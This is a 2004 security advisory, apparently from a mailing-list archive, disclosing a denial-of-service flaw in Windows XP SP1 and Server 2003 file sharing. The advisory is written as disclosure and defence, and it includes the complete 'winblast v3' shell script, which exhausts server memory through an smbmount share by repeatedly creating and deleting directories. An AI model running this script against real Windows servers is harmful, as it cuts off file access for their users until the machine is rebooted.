<<< Date Index >>>     <<< Thread Index >>>

smbmount disrupts Windows file sharing.



Announced: 2004-02-02
Type: Denial of Service Attack on Windows
Impact: smbmount can stop Windows from sharing files
Writer: Daniel Kabs, Germany (daniel.kabs@xxxxxx)
Credits: Thanks to Steve Ladjabi (steve.ladjabi@xxxxxx)

Contents:
1. Abstract
2. Affected Systems
3. Attack Setup
4. Symptoms 
5. Workaround


1. Abstract

A security vulnerability of "Windows XP" and "Windows 2003
Server" has been found. Theses systems are open to a denial
of service attack. If they share folders to a Unix client
that is using smbmount (part of the Samba suite), any user
on the client who has permissions to create directories on
the mounted share can stop the Windows system from serving
files. The attack induces a memory shortage on the Windows
system by creating directories in a special way.

2. Affected Systems

This denial of service attack has been carried out
successfully against
- Microsoft Windows XP Professional, Service Pack 1
- Microsoft Windows Server 2003

Microsoft Windows 2000 Prof. and earlier versions of
Windows are not affected by this attack.

3. Attack Setup

The attack was carried out successfully using
- "Debian Linux", smbmount 3.0.0beta2
- "Suse Linux 8.2", smbmount version 2.2.2
as Unix clients

The Windows system shares a folder. The Unix client mounts
the share using smbmount. A user on the Unix client has
write/create permissions to it the shared folder.

The user on the client creates and deletes a lot of
directories on the mounted share using the following
script:

#!/bin/sh
# winblast v3 - DoS on WinXP, Win2003Srv
# 2003-12-04 Steve Ladjabi

count=0

# using 'pathcount' directories
pathcount=1000

echo running \'winblast v3\' with $pathcount files in loop
...

while [ 1 ]; do
  p=$((pathcount*2-1))
  stop=$((pathcount-1))
  while [ "$p" != "$stop" ]; do
    dirname=wbst$p
    # delete old directory if it exists, exit on any error
    if [ -d $dirname ]; then
      rmdir $dirname || exit 3
    fi;

    # generating directory and exit on any error
    mkdir $dirname || exit 1
    p=$((p-1))
    count=$((count+1))
  done;
  echo $count directories generated ...
done;
#-- end --

The script will create 1000 directories and then takes
turns deleting and re-creating them. There will be no
more than those 1000 directories at any time!

Every time a directory is created, the Windows system
allocates paged pool memory. This memory is not freed
although the directory gets deleted.

After having created and deleted 3.5 millions directories,
the Windows system's paged pool memory has been depleted
and it denies access to the share. One tested Windows XP
system managed to take 5.8 millions directories until it
stopped serving. This happens about 4 hours after the
attack was started.

4. Symptoms 

When the Windows system suddenly fails, it ceases serving,
i.e. users can not access files nor list directory contents
any more from the client. Any client will have lost its
access the the share.

On the Windows system the event log shows an error with
event id 2020.

Additionally, the Administrator of the Windows system can
neither unshare the folder nor kill the session due to the
lack of memory resources. Trying to open the managment
console will result in error messages to this effect.
Executing the command "net share /delete" fails due to
the memory shortage.

The only way to get the Windows system working again is
to reboot it.

Putting more RAM in the maching running Windows will not
help as the paged pool memory is limited to 343MB. (See
MS KB article Q312362).

5. Workaround

Administrator should schedule a daily reboot of the
Windows system.